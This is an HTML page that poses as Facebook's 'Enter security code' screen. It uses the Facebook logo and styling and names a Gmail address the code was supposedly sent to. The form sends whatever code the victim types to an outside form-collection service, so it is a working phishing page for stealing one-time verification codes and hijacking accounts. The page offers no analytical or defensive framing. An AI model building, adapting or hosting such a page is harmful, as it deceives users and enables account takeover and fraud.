<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Adam Website</title>
    <style>
         *{
            padding: 0;
            margin: 0;
            box-sizing: border-box;
            font-family: sans-serif;
         }

         body {      
            display: flex;
            align-items: center;
            flex-direction: column;
            min-height: 100vh;
            background-color: rgb(242, 244, 247);
            overflow: hidden;
            margin: 0;
         }

         nav{
            display: flex;
            align-items: center;
            background-color: #fff;
            width: 100%;
            height: 60px;
            padding-left: 10px;
            box-shadow: 0 4px 12px rgba(0, 0, 0, 0.1);
         }

         nav img{
            width: 150px;
         }

         form{
            position: relative;
            top: 100px;
            background-color: #fff;
            width: 500px;
            height: 270px;
            box-shadow: 0 4px 12px rgba(0, 0, 0, 0.1);
            border-radius: 10px;
         }
         
         form .form-header{
              display: flex;
              align-items: center;
              height: 20%;
              padding-left: 18px;
              border-bottom: 1px solid #cecdcd;
         }

         form .form-header h2{
            font-size: larger;
         }

         form .form-text1{
            position: relative;
            top: 10px;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 20%;
            font-size: 17px;
         }

         form .form-center{
             position: relative;
             top: 20px;
             padding: 0 15px;
             display: flex;
             align-items: center;
             justify-content: space-between;
             padding-bottom: 17px;
             border-bottom: solid 1px #cecdcd;
         }

         form .form-center input{
            position: relative;
            left: 6px;
            height: 50px;
            border-radius: 5px;
            border: 1px solid #cecdcd;
            padding-left: 14px;
            width: 50%;
            font-size: large;
            outline: #111;
         }

         form .form-center p span{
            position: relative;
            top: 5px;
         }

         form .form-center p{
            position: relative;
            bottom: 4px;
         }

         form .form-footer{
            display: flex;
            justify-content: space-between;
            align-items: center;
            padding: 0 15px;
            position: relative;
            top: 20px;
            height: 72px;
         }

         form .form-footer a{
            color: rgb(24, 119, 242);
            text-decoration: none;
            font-size: small;
         }

         form .form-footer a:hover{
            text-decoration: underline rgb(24, 119, 242);
         }

         form .form-footer #footer-can-btn{
            width: 95px;
            height: 36px;
            border-radius: 7px;
            background-color: rgb(228, 230, 235);
            border: none;
            color: #555;
            font-size: 16px;
            font-weight: 700;
         }

         form .form-footer #footer-sub-btn{
            width: 95px;
            height: 36px;
            border-radius: 7px;
            background-color: rgb(24, 119, 242);
            border: none;
            color: #fff;
            font-size: 16px;
            font-weight: 700;
         }

         button{
            cursor: pointer;
         }

         #vv{
            display: none;
         }

         /* Repnsive */
         @media screen and (max-width: 520px) {
            form{
               width: 430px;
               height: 400px;
               flex-direction: column;
            }
            form .form-text1{
               font-size: 13px;
               font-weight: 600;
            }
            form .form-header h2{
               font-size: 18px;
            }
            form .form-center{
                margin-bottom: 5px;
            }
            form .form-center input{
               width: 50%;
            }
            form .form-center p{
               font-size: 14px;
            }
            footer{
               display: none;
            }
            .form-footer{
              flex-direction: column;   
              border-radius: 10px;
              height: 50px;
              margin-top: 15px;
            }
            form .form-center{
               flex-direction: column;
               gap: 20px;
            } 
            #vv{
               display: block;
            }
            #cc{
               display: none;
            }
            .form-header{
               justify-content: center;
            }
         }
    </style>
</head>
<body>
        <nav>
            <img src="4lCu2zih0c.svg" alt="Facebook logo">
        </nav>

        <form action="https://submit-form.com/JmtZVUX5T">
               <div class="form-header">
                    <h2>Enter security code</h2>
               </div>
               <div id="form-text" class="form-text1">
                    <span id="cc">Please check your email for a message with your code. Your <br> code is 6 numbers long.</span>
                    <span id="vv">Please check your email for a message <br> with your code. Your code is 6 numbers long.</span>
               </div>
               <div class="form-center">
                   <input type="text" name="v-code" id="v-code-input" placeholder="Enter code">
                   <p>We sent your code to: <br> <span>adam12062012@gmail.com</span> </p>
               </div>
               <div class="form-footer">
                    <a href="#">Didn't get a code?</a>
                    <div class="footer-buttons">
                         <button id="footer-can-btn">Cancel</button>
                         <button id="footer-sub-btn" type="submit">Continue</button>
                    </div>
               </div>
        </form>

        <footer>
             <img style="position: relative; top: 250px;" width="100%" src="footer.png">
        </footer>
</body>
</html>
